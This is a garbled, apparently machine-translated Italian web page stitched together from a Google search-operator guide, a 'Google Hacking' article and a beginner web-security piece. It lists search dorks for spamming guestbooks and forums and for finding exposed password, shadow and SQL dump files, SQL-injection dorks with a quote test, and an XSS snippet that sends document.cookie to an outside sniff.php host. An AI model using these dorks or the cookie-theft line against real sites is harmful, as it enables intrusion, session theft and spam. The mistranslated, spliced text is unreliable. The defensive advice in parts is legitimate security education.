LA CAMPANA

C'è chi legge questa notizia prima di te.
Iscriviti per ricevere gli ultimi articoli.
E-mail
Nome
Cognome
Come vuoi leggere The Bell
Niente spam

Come cercare correttamente con google.com

Probabilmente tutti sanno come utilizzare un motore di ricerca come Google \u003d) Ma non tutti sanno che se componi correttamente una query di ricerca utilizzando costruzioni speciali, puoi ottenere i risultati che stai cercando in modo molto più efficiente e più veloce \u003d) In questo articolo proverò a dimostrare che e come è necessario eseguire una ricerca corretta

Google supporta diversi operatori di ricerca avanzata che hanno un significato speciale durante la ricerca su google.com. In genere, questi operatori modificano la ricerca o addirittura dicono a Google di eseguire tipi di ricerca completamente diversi. Ad esempio, la costruzione link: è un operatore speciale e la richiesta link: www.google.com non ti darà una ricerca normale, ma troverà invece tutte le pagine web che hanno collegamenti a google.com.
tipi di richiesta alternativi

cache: Se includi altre parole nella tua query, Google evidenzierà quelle parole incluse nel documento memorizzato nella cache.
Per esempio, cache: sito www.web mostrerà il contenuto memorizzato nella cache con la parola "web" evidenziata.

link: la query di ricerca discussa sopra mostrerà le pagine Web che contengono collegamenti alla query specificata.
Per esempio: link: www.site visualizzerà tutte le pagine che hanno un link a http: //www.site

relazionato: Visualizza le pagine Web "correlate" alla pagina Web specificata.
Per esempio, correlati: www.google.com elencherà le pagine Web simili alla home page di Google.

informazioni: Richiedi informazioni: fornisce alcune delle informazioni di Google sulla pagina Web richiesta.
Per esempio, info: sito web mostrerà informazioni sul nostro forum \u003d) (Armada - Forum di webmaster adulti).

Altre richieste di informazioni

definire: La query define: fornirà una definizione delle parole inserite successivamente, compilata da varie fonti online. La definizione sarà per l'intera frase inserita (cioè, includerà tutte le parole nella query esatta).

scorte: Se inizi la tua richiesta con scorte: Google tratterà il resto dei termini della richiesta come simboli di ticker di azioni e collegherà a una pagina che mostra le informazioni pronte per tali simboli.
Per esempio, titoli: Intel Yahoo mostrerà informazioni su Intel e Yahoo. (Nota che devi digitare gli ultimi simboli delle notizie, non il nome dell'azienda)

Modificatori di richieste

posto: Se includi il sito: nella tua query, Google limiterà i risultati ai siti Web che trova nel dominio specificato.
Puoi anche cercare singole zone, come ru, org, com, ecc. ( sito: com sito: ru)

allintitle: Se esegui una query con allintitle:, Google limiterà i risultati con tutte le parole della query nell'intestazione.
Per esempio, allintitle: ricerca su google restituirà tutte le pagine di ricerca di Google come immagini, blog, ecc

intitle: Se includi intitle: nella tua richiesta, Google limiterà i risultati ai documenti contenenti quella parola nel titolo.
Per esempio, intitle: Business

allinurl: Se esegui una query con allinurl: Google limiterà i risultati, con tutte le parole della query nell'URL.
Per esempio, allinurl: ricerca su google restituirà i documenti con google e cercherà nell'intestazione. Inoltre, come opzione, puoi separare le parole con una barra (/), quindi le parole su entrambi i lati della barra verranno cercate all'interno della stessa pagina: Esempio allinurl: foo / bar

inurl: Se includi inurl: nella tua query, Google limiterà i risultati ai documenti contenenti quella parola nell'URL.
Per esempio, Animazione inurl: sito web

nel testo: cerca solo la parola specificata nel testo della pagina, ignorando il titolo e i testi dei collegamenti e altre cose non correlate. Esiste anche una derivata di questo modificatore: allintext: quelli. inoltre, tutte le parole nella query verranno cercate solo nel testo, il che è anche importante, ignorando le parole usate di frequente nei collegamenti
Per esempio, intext: forum

intervallo di date: ricerche in intervalli di tempo (data: 2452389-2452389), le date per gli orari sono specificate nel formato giuliano.

Bene, e ogni sorta di interessanti esempi di richieste

Esempi di scrittura di query per Google. Per gli spammer

Inurl: control.guest? A \u003d segno

Sito: books.dreambook.com "URL della home page" "Firma il mio" inurl: firma

Sito: www.freegb.net Homepage

Inurl: sign.asp “Character Count”

"Messaggio:" inurl: sign.cfm "Mittente:"

Inurl: register.php “Registrazione utente” “Sito Web”

Inurl: edu / guestbook “Sign the Guestbook”

Inurl: pubblica "Pubblica commento" "URL"

Inurl: / archives / “Commenti:” “Ricorda informazioni?”

"Script e libro degli ospiti creato da:" "URL:" "Commenti:"

Inurl :? Action \u003d aggiungi "phpBook" "URL"

Intitle: "Invia nuova storia"

riviste

Inurl: www.livejournal.com/users/ mode \u003d rispondi

Inurl greatestjournal.com/ mode \u003d rispondi

Inurl: fastbb.ru/re.pl?

Inurl: fastbb.ru /re.pl? "Libro degli ospiti"

Blog

Inurl: blogger.com/comment.g? ”PostID” "anonimo"

Inurl: typepad.com/ "Pubblica un commento" "Ricorda le informazioni personali?"

Inurl: greatestjournal.com/community/ "Pubblica commento" "indirizzi di poster anonimi"

"Pubblica commento" "indirizzi di poster anonimi" -

Intitle: "Invia commento"

Inurl: pirillo.com “Posta commento”

Forum

Inurl: gate.html? ”Nome \u003d Forum” “mode \u003d reply”

Inurl: "forum / posting.php? Mode \u003d reply"

Inurl: "mes.php?"

Inurl: "members.html"

Inurl: forum / memberlist.php? ”

Hacking con Google

Alexander Antipov

Il motore di ricerca di Google (www.google.com) offre molte opzioni di ricerca. Tutte queste funzionalità sono uno strumento di ricerca inestimabile per un utente di Internet per la prima volta e, allo stesso tempo, un'arma ancora più potente di invasione e distruzione nelle mani di persone con intenzioni malvagie, inclusi non solo hacker, ma anche criminali non informatici e persino terroristi.
(9475 visualizzazioni in 1 settimana)


Denis Batrankov
denisNOSPAMixi.ru

Attenzione:Questo articolo non è una guida all'azione. Questo articolo è stato scritto per te, amministratori dei server WEB, in modo da perdere la falsa sensazione di essere al sicuro e finalmente comprendere l'insidiosità di questo metodo per ottenere informazioni e iniziare a proteggere il tuo sito.

introduzione

Ad esempio, ho trovato 1670 pagine in 0,14 secondi!

2. Introduciamo un'altra riga, ad esempio:

inurl: "auth_user_file.txt"

un po 'meno, ma questo è già sufficiente per il download gratuito e per indovinare la password bruta (usando lo stesso John The Ripper). Di seguito fornirò alcuni altri esempi.

Pertanto, è necessario rendersi conto che il motore di ricerca di Google ha visitato la maggior parte dei siti su Internet e memorizzato le informazioni in essi contenute nella cache. Queste informazioni memorizzate nella cache ti consentono di ottenere informazioni sul sito e sul contenuto del sito senza una connessione diretta al sito, semplicemente scavando nelle informazioni memorizzate all'interno di Google. Inoltre, se le informazioni sul sito non sono più disponibili, le informazioni nella cache potrebbero essere conservate. Tutto ciò che serve per questo metodo è conoscere alcune parole chiave di Google. Questa tecnica si chiama Google Hacking.

Per la prima volta, 3 anni fa sono comparse sulla mailing list Bugtruck informazioni su Google Hacking. Nel 2001, questo argomento è stato sollevato da uno studente francese. Ecco un link a questa lettera http://www.cotse.com/mailing-lists/bugtraq/2001/Nov/0129.html. Fornisce i primi esempi di tali query:

1) Indice di / admin
2) Indice di / password
3) Indice di / posta
4) Indice di / + banchetti + tipo di file: xls (per francia ...)
5) Indice di / + passwd
6) Indice di / password.txt

Questo argomento ha avuto un recente successo nella parte di Internet in lingua inglese abbastanza recentemente: dopo l'articolo di Johnny Long pubblicato il 7 maggio 2004. Per uno studio più completo di Google Hacking, ti consiglio di visitare il sito di questo autore all'indirizzo http://johnny.ihackstuff.com. In questo articolo, voglio solo aggiornarti.

Chi può usarlo:
- I giornalisti, le spie e tutte quelle persone a cui piace infilare il naso nei propri affari possono usarlo per cercare prove compromettenti.
- Gli hacker che cercano obiettivi adatti per l'hacking.

Come funziona Google.

Per continuare la conversazione, lascia che ti ricordi alcune delle parole chiave utilizzate nelle query di Google.

Cerca usando il segno +

Google esclude dalla ricerca, a suo avviso, parole non importanti. Ad esempio, parole di domande, preposizioni e articoli in inglese: ad esempio sono, di, dove. In russo, Google sembra considerare tutte le parole importanti. Se la parola è esclusa dalla ricerca, Google ne scrive. Affinché Google inizi a cercare pagine con queste parole davanti a loro, devi aggiungere un segno + senza uno spazio prima della parola. Per esempio:

asso + di base

Cerca per segno -

Se Google trova un gran numero di pagine dalle quali è necessario escludere pagine con un argomento specifico, è possibile forzare Google a cercare solo pagine che non hanno parole specifiche. Per fare questo, è necessario indicare queste parole, mettendo davanti a ciascun segno - senza uno spazio prima della parola. Per esempio:

vodka da pesca

Cerca usando ~

Potresti voler trovare non solo la parola specificata, ma anche i suoi sinonimi. Per fare ciò, precedere la parola con il simbolo ~.

Trovare la frase esatta usando le doppie virgolette

Google cerca su ogni pagina tutte le occorrenze delle parole che hai scritto nella stringa di query e non si preoccupa della posizione relativa delle parole, la cosa principale è che tutte le parole specificate sono sulla pagina contemporaneamente (questa è l'azione predefinita). Per trovare la frase esatta, è necessario inserirla tra virgolette. Per esempio:

"Reggilibri"

Per avere almeno una delle parole specificate, è necessario specificare esplicitamente l'operazione logica: OR Per esempio:

sicurezza del libro o protezione

Inoltre, è possibile utilizzare il segno * nella barra di ricerca per indicare qualsiasi parola e. per indicare qualsiasi personaggio.

Trovare parole usando operatori aggiuntivi

Esistono operatori di ricerca specificati nella stringa di ricerca nel formato:

operatore: search_term

Gli spazi accanto al colon non sono necessari. Se inserisci uno spazio dopo i due punti, visualizzerai un messaggio di errore e prima di esso, Google li utilizzerà come una normale stringa di ricerca.
Esistono gruppi di operatori di ricerca aggiuntivi: lingue - indica in quale lingua vuoi vedere il risultato, data - limita i risultati negli ultimi tre, sei o 12 mesi, occorrenze - indica dove nel documento devi cercare una stringa: ovunque, nel titolo, nell'URL, nei domini - cerca nel sito specificato o, al contrario, lo esclude dalla ricerca, ricerca sicura - blocca i siti contenenti il \u200b\u200btipo specificato di informazioni e li rimuove dalle pagine dei risultati della ricerca.
Tuttavia, alcuni operatori non necessitano di un parametro aggiuntivo, ad esempio la query " cache: www.google.com"può essere chiamato come una stringa di ricerca completa e alcune parole chiave, al contrario, richiedono una parola di ricerca, ad esempio" sito: www.google.com aiuto". Alla luce del nostro argomento, diamo un'occhiata ai seguenti operatori:

Operatore

Descrizione

Richiede un parametro aggiuntivo?

cerca solo sul sito specificato in search_term

cerca solo nei documenti con il tipo search_term

trova pagine contenenti search_term nel titolo

trova pagine contenenti tutte le parole search_term nel titolo

trova le pagine contenenti la parola search_term nel loro URL

trova le pagine che contengono tutte le parole search_term nel loro URL

Operatore posto: limita la ricerca solo al sito specificato e puoi specificare non solo il nome del dominio, ma anche l'indirizzo IP. Ad esempio, inserisci:

Operatore tipo di file: limita le ricerche a file di un tipo specifico. Per esempio:

A partire dalla data di rilascio dell'articolo, Google può cercare in 13 diversi formati di file:

  • Adobe Portable Document Format (pdf)
  • Adobe PostScript (ps)
  • Lotus 1-2-3 (wk1, wk2, wk3, wk4, wk5, wki, wks, wku)
  • Lotus WordPro (lwp)
  • MacWrite (mw)
  • Microsoft Excel (xls)
  • Microsoft PowerPoint (ppt)
  • Microsoft Word (doc)
  • Microsoft Works (wks, wps, wdb)
  • Microsoft Write (wri)
  • Rich Text Format (rtf)
  • Shockwave Flash (swf)
  • Testo (ans, txt)

Operatore link: mostra tutte le pagine che puntano alla pagina specificata.
Probabilmente è sempre interessante vedere quanti posti su Internet conoscono te. Provando:

Operatore cache: mostra la versione del sito nella cache di Google come appariva l'ultima volta che Google ha visitato questa pagina. Prendiamo qualsiasi sito che cambia frequentemente e guardiamo a:

Operatore intitle: cerca la parola specificata nel titolo della pagina. Operatore allintitle: è un'estensione: cerca tutte le parole multiple specificate nel titolo della pagina. Confrontare:

intitle: volo su Marte
intitle: flight intitle: to intitle: mars
allintitle: volo per Marte

Operatore inurl:consente a Google di visualizzare tutte le pagine contenenti la stringa specificata nell'URL. Operator allinurl: cerca tutte le parole in un URL. Per esempio:

allinurl: acid acid_stat_alerts.php

Questo comando è particolarmente utile per coloro che non hanno SNORT - almeno possono vedere come funziona su un sistema reale.

Metodi di hacking con Google

Quindi, abbiamo scoperto che utilizzando una combinazione dei suddetti operatori e parole chiave, chiunque può iniziare a raccogliere le informazioni necessarie e cercare le vulnerabilità. Queste tecniche sono spesso indicate come Google Hacking.

Mappa del sito

Puoi utilizzare il sito: operatore per vedere tutti i link che Google trova sul sito. Di solito, le pagine create in modo dinamico dagli script non vengono indicizzate utilizzando i parametri, quindi alcuni siti utilizzano i filtri ISAPI in modo che i collegamenti non siano nel modulo /article.asp?num\u003d10&dst\u003d5e con le barre / article / abc / num / 10 / dst / 5... Questo viene fatto in modo che il sito sia generalmente indicizzato dai motori di ricerca.

Proviamo:

sito: www.whitehouse.gov whitehouse

Google pensa che ogni pagina del sito contenga la parola whitehouse. Questo è ciò che usiamo per ottenere tutte le pagine.
Esiste anche una versione semplificata:

sito: whitehouse.gov

E la parte migliore è che i compagni di whitehouse.gov non sapevano nemmeno che abbiamo esaminato la struttura del loro sito e persino guardato nelle pagine memorizzate nella cache che Google ha scaricato da solo. Questo può essere usato per studiare la struttura dei siti e visualizzare il contenuto, rimanendo inosservato per il momento.

Visualizzazione di un elenco di file nelle directory

I server WEB possono visualizzare elenchi di directory dei server anziché normali pagine HTML. Questo di solito viene fatto per indurre gli utenti a selezionare e scaricare file specifici. Tuttavia, in molti casi, gli amministratori non hanno intenzione di mostrare il contenuto di una directory. Ciò si verifica a causa di una configurazione errata del server o dell'assenza della pagina principale nella directory. Di conseguenza, l'hacker ha la possibilità di trovare qualcosa di interessante nella directory e usarlo per i propri scopi. Per trovare tutte queste pagine, basta notare che contengono tutte le parole: indice di nel loro titolo. Ma poiché l'indice di parole non contiene solo tali pagine, dobbiamo chiarire la query e tenere conto delle parole chiave sulla pagina stessa, quindi le query del modulo sono adatte a noi:

intitle: index.of directory principale
intitle: index.of nome dimensione

Poiché la maggior parte degli elenchi di directory sono intenzionali, potrebbe essere difficile trovare elenchi errati la prima volta. Ma almeno puoi già utilizzare gli elenchi per determinare la versione del server WEB, come descritto di seguito.

Ottenere la versione del server WEB.

Conoscere la versione del server WEB è sempre utile prima di iniziare qualsiasi attacco hacker. Ancora una volta, grazie a Google, puoi ottenere queste informazioni senza collegarti a un server. Se osservi attentamente l'elenco della directory, puoi vedere che il nome del server WEB e la sua versione sono visualizzati lì.

Apache1.3.29 - Server ProXad su trf296.free.fr Porta 80

Un amministratore esperto può modificare queste informazioni, ma, di regola, è vero. Pertanto, per ottenere queste informazioni, è sufficiente inviare una richiesta:

intitle: index.of server.at

Per ottenere informazioni per un server specifico, chiariamo la richiesta:

intitle: index.of server.at sito: ibm.com

O viceversa, stiamo cercando server in esecuzione su una versione specifica del server:

intitle: index.of Apache / 2.0.40 Server all'indirizzo

Questa tecnica può essere utilizzata da un hacker per trovare una vittima. Se, ad esempio, ha un exploit per una determinata versione del server WEB, allora può trovarlo e provare l'exploit esistente.

È inoltre possibile ottenere la versione del server visualizzando le pagine installate per impostazione predefinita quando si installa una nuova versione del server WEB. Ad esempio, per vedere la pagina di test di Apache 1.2.6, basta digitare

intitle: Test.Page.for.Apache it.worked!

Inoltre, alcuni sistemi operativi installano ed eseguono immediatamente il server WEB durante l'installazione. Tuttavia, alcuni utenti non ne sono nemmeno consapevoli. Naturalmente, se vedi che qualcuno non ha eliminato la pagina predefinita, è logico supporre che il computer non sia stato sottoposto a nessuna configurazione ed è probabilmente vulnerabile agli attacchi.

Prova a trovare le pagine IIS 5.0

allintitle: Benvenuti in Windows 2000 Internet Services

Nel caso di IIS, è possibile determinare non solo la versione del server, ma anche la versione di Windows e il Service Pack.

Un altro modo per determinare la versione del server WEB è cercare manuali (pagine di aiuto) ed esempi che possono essere installati sul sito per impostazione predefinita. Gli hacker hanno trovato molti modi per utilizzare questi componenti per ottenere un accesso privilegiato al sito. Ecco perché è necessario rimuovere questi componenti nel sito di produzione. Per non parlare del fatto che dalla presenza di questi componenti è possibile ottenere informazioni sul tipo di server e sulla sua versione. Ad esempio, troviamo il manuale di apache:

inurl: moduli manuali di istruzioni apache

Utilizzo di Google come scanner CGI.

Lo scanner CGI o lo scanner WEB è un'utilità per trovare script e programmi vulnerabili sul server della vittima. Queste utility dovrebbero sapere cosa cercare, per questo hanno un intero elenco di file vulnerabili, ad esempio:

/cgi-bin/cgiemail/uargg.txt
/random_banner/index.cgi
/random_banner/index.cgi
/cgi-bin/mailview.cgi
/cgi-bin/maillist.cgi
/cgi-bin/userreg.cgi

/iissamples/ISSamples/SQLQHit.asp
/SiteServer/admin/findvserver.asp
/scripts/cphost.dll
/cgi-bin/finger.cgi

Possiamo trovare ciascuno di questi file usando Google, usando l'indice di parole o inurl oltre al nome del file nella barra di ricerca: possiamo trovare siti con script vulnerabili, ad esempio:

allinurl: /random_banner/index.cgi

Utilizzando ulteriori conoscenze, un hacker può sfruttare una vulnerabilità di script e utilizzare questa vulnerabilità per forzare lo script a restituire qualsiasi file archiviato sul server. Ad esempio un file di password.

Come proteggersi dagli hacker di Google.

1. Non pubblicare dati importanti sul server WEB.

Anche se hai pubblicato i dati temporaneamente, puoi dimenticartene o qualcuno avrà il tempo di trovare e prendere questi dati prima di cancellarli. Non farlo. Esistono molti altri modi per trasferire i dati per proteggerli dal furto.

2. Controlla il tuo sito.

Usa i metodi descritti per cercare il tuo sito. Controlla periodicamente il tuo sito con i nuovi metodi che appaiono sul sito http://johnny.ihackstuff.com. Ricorda che se desideri automatizzare le tue azioni, devi ottenere un'autorizzazione speciale da Google. Se leggi attentamente http://www.google.com/terms_of_service.html quindi vedrai la frase: non puoi inviare query automatizzate di alcun tipo al sistema di Google senza previa autorizzazione esplicita di Google.

3. Potrebbe non essere necessario che Google indicizzi il tuo sito o parte di esso.

Google ti consente di rimuovere un link al tuo sito o parte di esso dal suo database, nonché rimuovere le pagine dalla cache. Inoltre, puoi vietare la ricerca di immagini sul tuo sito, vietare la visualizzazione di brevi frammenti di pagine nei risultati di ricerca.Tutte le opzioni per la rimozione di un sito sono descritte nella pagina http://www.google.com/remove.html ... Per fare ciò, devi confermare che sei effettivamente il proprietario di questo sito o inserire tag nella pagina o

4. Utilizzare robots.txt

È noto che i motori di ricerca esaminano il file robots.txt situato nella radice del sito e non indicizzano le parti contrassegnate con la parola rifiutare... Puoi approfittare di questo per evitare che parte del sito venga indicizzata. Ad esempio, per evitare di indicizzare l'intero sito, creare un file robots.txt contenente due righe:

Agente utente: *
Non consentire: /

Cos'altro succede

Affinché la vita non ti sembri cara, dirò alla fine che ci sono siti che seguono quelle persone che, usando i metodi sopra, stanno cercando buchi negli script e nei server WEB. Un esempio di tale pagina è

Applicazione.

Un po 'dolce. Prova tu stesso qualcosa dal seguente elenco:

1. #mysql dump filetype: sql - trova i dump dei database mySQL
2. Rapporto di riepilogo delle vulnerabilità dell'host: mostra quali vulnerabilità sono state rilevate da altre persone
3.phpMyAdmin in esecuzione su inurl: main.php - questo forzerà il controllo ravvicinato tramite il pannello phpmyadmin
4.non riservato alla distribuzione
5. Richiedi dettagli Variabili del server dell'albero di controllo
6. In esecuzione in modalità figlio
7. Questo rapporto è stato generato da WebLog
8.intitle: index.of di cgiirc.config
9.filetype: conf inurl: firewall -intitle: cvs - qualcuno può aver bisogno dei file di configurazione del firewall? :)
10. intitle: index.of finances.xls - hmm ....
11.intitle: indice delle chat dbconvert.exe - registri chat icq
12.intext: analisi del traffico Tobias Oetiker
13.intitle: statistiche di utilizzo generate da Webalizer
14.intitle: statistiche di statistiche web avanzate
15.intitle: index.of ws_ftp.ini - ws ftp config
16.inurl: ipsec.secrets contiene segreti condivisi: la chiave segreta è una buona scoperta
17.inurl: main.php Benvenuti in phpMyAdmin
18.inurl: informazioni sul server Apache Server-info
19.site: edu gradi di amministrazione
20. ORA-00921: fine imprevista del comando SQL - recupero dei percorsi
21. intitle: index.of trillian.ini
22. intitle: indice di pwd.db
23. intitle: index.of people.lst
24. intitle: index.of master.passwd
25. inurl: passlist.txt
26. intitle: indice di .mysql_history
27. intitle: indice di testo: globals.inc
28. intitle: index.of administrators.pwd
29. intitle: Index.of etc shadow
30. intitle: index.of secring.pgp
31.inurl: config.php dbuname dbpass
32. inurl: perform filetype: ini

  • "Hacking mit Google"
  • Centro di formazione "Informzashita" http://www.itsecurity.ru - un centro specializzato leader nel campo della formazione sulla sicurezza delle informazioni (Licenza del Comitato per l'Istruzione di Mosca n. 015470, accreditamento statale n. 004251). L'unico centro di formazione autorizzato per i sistemi di sicurezza Internet e Clearswift in Russia e nei paesi della CSI. Centro di formazione autorizzato Microsoft (specializzazione in sicurezza). I programmi di formazione sono coordinati con la Commissione tecnica statale della Russia, l'FSB (FAPSI). Certificati di formazione e documenti statali sullo sviluppo professionale.

    SoftKey è un servizio unico per acquirenti, sviluppatori, rivenditori e partner affiliati. Inoltre, è uno dei migliori negozi di software online in Russia, Ucraina, Kazakistan, che offre ai clienti un vasto assortimento, molti metodi di pagamento, una rapida (spesso istantanea) elaborazione degli ordini, il monitoraggio del processo di esecuzione degli ordini nella sezione personale, vari sconti dal negozio e dai produttori DI.

    Ho deciso di parlare un po 'della sicurezza delle informazioni. L'articolo sarà utile per i programmatori principianti e per coloro che hanno appena iniziato a sviluppare Frontend. Qual è il problema?

    Molti sviluppatori alle prime armi sono così dipendenti dalla scrittura di codice che dimenticano completamente la sicurezza del loro lavoro. E, soprattutto, dimenticano le vulnerabilità come query SQL, XXS. Forniscono anche password leggere per i loro pannelli di amministrazione e sono soggetti a forza bruta. Quali sono questi attacchi e come possono essere evitati?

    SQL Injection

    L'iniezione SQL è il tipo più comune di attacco al database che viene eseguito con una query SQL per un DBMS specifico. Molte persone e persino grandi aziende soffrono di tali attacchi. Il motivo è l'errore di uno sviluppatore durante la scrittura di un database e, di fatto, le query SQL.

    Un attacco di iniezione SQL è possibile a causa dell'elaborazione errata dei dati di input utilizzati nelle query SQL. Se un hacker completa correttamente un attacco, rischi di perdere non solo il contenuto dei database, ma anche le password e i registri del pannello amministrativo, rispettivamente. E questi dati saranno abbastanza sufficienti per assumere completamente il sito o apportare modifiche irreversibili ad esso.

    L'attacco può essere riprodotto con successo in script scritti in PHP, ASP, Perl e altre lingue. Il successo di tali attacchi dipende maggiormente dal DBMS utilizzato e dall'implementazione dello scenario stesso. Esistono molti siti vulnerabili di iniezione SQL nel mondo. Questo è facile da verificare. Basta inserire "dorks": si tratta di richieste speciali per la ricerca di siti vulnerabili. Ecco qui alcuni di loro:

    • inurl: index.php? id \u003d
    • inurl: trainers.php? id \u003d
    • inurl: buy.php? categoria \u003d
    • inurl: article.php? ID \u003d
    • inurl: play_old.php? id \u003d
    • inurl: dichiarazione_more.php? decl_id \u003d
    • inurl: pageid \u003d
    • inurl: games.php? id \u003d
    • inurl: page.php? file \u003d
    • inurl: newsDetail.php? id \u003d
    • inurl: gallery.php? id \u003d
    • inurl: article.php? id \u003d

    Come usarli? Basta inserirli nel motore di ricerca di Google o Yandex. Il motore di ricerca ti fornirà non solo un sito vulnerabile, ma anche una pagina per questa vulnerabilità. Ma non ci soffermeremo su questo e ci assicureremo che la pagina sia davvero vulnerabile. Per fare ciò, è sufficiente inserire una virgoletta singola "″" dopo il valore "id \u003d 1". Qualcosa come questo:

    • inurl: games.php? id \u003d 1 '

    E il sito ci darà un errore sulla query SQL. Di cosa ha bisogno il nostro hacker dopo?

    E poi ha bisogno di questo link alla pagina dell'errore. Quindi il lavoro sulla vulnerabilità nella maggior parte dei casi si svolge nella distribuzione "Kali linux" con le sue utilità per questa parte: iniettare il codice di iniezione ed eseguire le operazioni necessarie. Come ciò accadrà, non posso dirtelo. Ma puoi trovare informazioni al riguardo su Internet.

    Attacco XSS

    Questo tipo di attacco viene eseguito sui cookie. Gli utenti, a loro volta, amano molto salvarli. Perchè no? Come senza di loro? Infatti, grazie ai cookie, non guidiamo la password da Vk.com o Mail.ru cento volte. E pochi di quelli che li rifiutano. Ma su Internet, spesso appare una regola per gli hacker: il fattore convenienza è direttamente proporzionale al fattore insicurezza.

    Per implementare un attacco XSS, il nostro hacker ha bisogno di conoscenza di JavaScript. A prima vista, la lingua è molto semplice e innocua, perché non ha accesso alle risorse del computer. Un hacker può lavorare con JavaScript solo in un browser, ma è abbastanza. Dopo tutto, l'importante è inserire il codice nella pagina web.

    Non parlerò in dettaglio del processo di attacco. Ti dirò solo le basi e il significato di come ciò accada.

    Un hacker può aggiungere il codice JS a un forum o a un libro degli ospiti:

    Gli script ci reindirizzeranno alla pagina infetta, dove verrà eseguito il codice: che si tratti di uno sniffer, di un qualche tipo di archiviazione o di un exploit che in qualche modo ruberà i nostri cookie dalla cache.

    Perché JavaScript Perché JavaScript va d'accordo con le richieste Web e ha accesso ai cookie. Ma se il nostro script ci trasferisce su qualche sito, l'utente lo noterà facilmente. Qui l'hacker utilizza un'opzione più astuta: scrive semplicemente il codice nell'immagine.

    Img \u003d new Image ();

    Img.src \u003d "http://192.168.1.7/sniff.php?32+document.cookie;

    Creiamo semplicemente un'immagine e assegniamo la nostra sceneggiatura come indirizzo.

    Come proteggerti da tutto questo? Molto semplice: non fare clic su collegamenti sospetti.

    Attacchi DoS e DDos


    DoS (dall'inglese Denial of Service - denial of service) - un attacco di un hacker a un sistema informatico con lo scopo di portarlo al fallimento. Questa è la creazione di tali condizioni alle quali gli utenti coscienziosi del sistema non possono accedere alle risorse di sistema (server) fornite, o questo accesso è difficile. Il fallimento del sistema può essere un passo verso la sua acquisizione, se in una situazione di emergenza il software fornisce informazioni critiche: ad esempio, la versione, parte del codice del programma, ecc. Ma molto spesso si tratta di una misura di pressione economica: la perdita di un semplice servizio che genera reddito. Le bollette del fornitore o le misure per evitare un attacco colpiscono in modo significativo il "bersaglio" nella tasca. Attualmente, gli attacchi DoS e DDoS sono i più popolari, poiché consentono a quasi tutti i sistemi di fallire senza lasciare prove giuridicamente significative.

    Qual è la differenza tra attacchi DoS e DDos?

    DoS è un attacco abilmente costruito. Ad esempio, se il server non verifica la correttezza dei pacchetti in entrata, un hacker può effettuare tale richiesta, che verrà elaborata per sempre e non ci sarà tempo del processore sufficiente per lavorare con altre connessioni. Di conseguenza, i clienti riceveranno un diniego di servizio. Ma non funzionerà in questo modo per sovraccaricare o disabilitare siti noti di grandi dimensioni. Sono dotati di canali abbastanza ampi e server super potenti che possono facilmente far fronte a un tale sovraccarico.

    DDoS è in realtà lo stesso attacco di DoS. Ma se c'è un pacchetto di richiesta in DoS, allora in DDoS possono essercene centinaia o più. Anche i server superpotenti potrebbero non essere in grado di gestire questo sovraccarico. Lasciate che vi faccia un esempio.

    L'attacco DoS è quando stai conversando con qualcuno, ma poi una persona maleducata si avvicina e inizia a urlare ad alta voce. Allo stesso tempo, è impossibile o molto difficile parlare. Soluzione: chiamare la sicurezza, che si calmerà e condurrà la persona fuori dalla stanza. Gli attacchi DDoS si verificano quando persone così maleducate vengono portate di corsa da una folla di migliaia. In questo caso, le guardie non saranno in grado di torcere e portare via tutti.

    DoS e DDoS sono prodotti da computer chiamati zombi. Questi sono computer di utenti hackerati da hacker che non sospettano nemmeno che la loro macchina sia coinvolta in un attacco a un server.

    Come proteggerti da questo? In generale, niente. Ma è possibile complicare il compito di un hacker. Per fare questo, devi scegliere un buon hosting con server potenti.

    Attacco di forza bruta

    Uno sviluppatore può inventare molti sistemi di protezione contro gli attacchi, visualizzare completamente gli script che abbiamo scritto, controllare le vulnerabilità nel sito, ecc. Ma quando si tratta dell'ultimo passaggio del layout del sito, vale a dire quando inserirà una password nel pannello di amministrazione, potrebbe dimenticare una cosa. Parola d'ordine!

    Si consiglia vivamente di non impostare una password semplice. Può essere 12345, 1114457, vasya111, ecc. Non è consigliabile impostare password di lunghezza inferiore a 10-11 caratteri. Altrimenti, potresti subire l'attacco più comune e non difficile: la forza bruta.

    La forza bruta è un attacco di forza bruta basato su dizionario che utilizza programmi speciali. I dizionari possono essere diversi: latino, enumerazione per numero, dire fino a un certo intervallo, misto (latino + numeri) e persino ci sono dizionari con simboli univoci @ # 4 $% & * ~~ `’ ”\\? eccetera.

    Naturalmente, questo tipo di attacco può essere facilmente evitato creando una password complessa. Anche captcha può salvarti. Inoltre, se il tuo sito è realizzato su un CMS, molti di loro calcolano questo tipo di attacco e bloccano l'ip. Devi sempre ricordare che più caratteri ci sono nella password, più è difficile trovarla.

    Come funzionano gli hacker? Nella maggior parte dei casi, sospettano o conoscono in anticipo parte della password. È abbastanza logico supporre che la password dell'utente non sarà certamente composta da 3 o 5 caratteri. Queste password portano a frequenti hack. Fondamentalmente, gli hacker prendono un intervallo da 5 a 10 caratteri e aggiungono alcuni personaggi lì, che probabilmente conoscono in anticipo. Successivamente, le password vengono generate con gli intervalli richiesti. La distribuzione di Linux Kali contiene anche programmi per questi casi. E voilà, l'attacco non durerà più a lungo, poiché il volume del dizionario non è più così grande. Inoltre, un hacker può utilizzare la potenza della scheda video. Alcuni supportano il sistema CUDA e la velocità di ricerca aumenta fino a 10 volte. E ora vediamo che un attacco in un modo così semplice è abbastanza reale. Ma non solo i siti sono soggetti a forza bruta.

    Cari sviluppatori, non dimenticate mai del sistema di sicurezza delle informazioni, perché oggi molte persone, compresi gli stati, soffrono di questi tipi di attacchi. Dopotutto, la più grande vulnerabilità è una persona che può sempre essere distratta da qualche parte o non trascurare da qualche parte. Siamo programmatori, ma non macchine programmate. Stai sempre attento, perché la perdita di informazioni minaccia di gravi conseguenze!

    LA CAMPANA

    C'è chi legge questa notizia prima di te.
    Iscriviti per ricevere gli ultimi articoli.
    E-mail
    Nome
    Cognome
    Come vuoi leggere The Bell
    Niente spam